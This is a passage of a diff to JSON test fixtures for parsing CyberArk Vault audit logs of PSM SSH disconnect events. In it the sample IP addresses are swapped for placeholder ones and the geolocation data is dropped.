Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:36\",\"IsoTimestamp\":\"2021-03-15T14:08:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813844200Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:36\",\"IsoTimestamp\":\"2021-03-15T14:08:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", 
@@ -1917,39 +1687,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1966,7 +1715,7 @@ }, "@timestamp": "2021-03-15T15:00:21.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1977,16 +1726,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T15:00:21Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n 
\u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -1998,8 +1746,8 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:49:12" }, "rfc5424": true, @@ -2007,7 +1755,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -2020,9 +1768,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615819476" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 15 08:00:21", "desc": "PSM Disconnect" 
@@ -2034,8 +1782,8 @@ "event": { "severity": 2, "duration": 2952000000000, - "ingested": "2021-06-09T10:24:31.624832200Z", - "original": "\u003c5\u003e1 2021-03-15T15:00:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:00:21\",\"IsoTimestamp\":\"2021-03-15T15:00:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813849500Z", + "original": "\u003c5\u003e1 2021-03-15T15:00:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:00:21\",\"IsoTimestamp\":\"2021-03-15T15:00:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
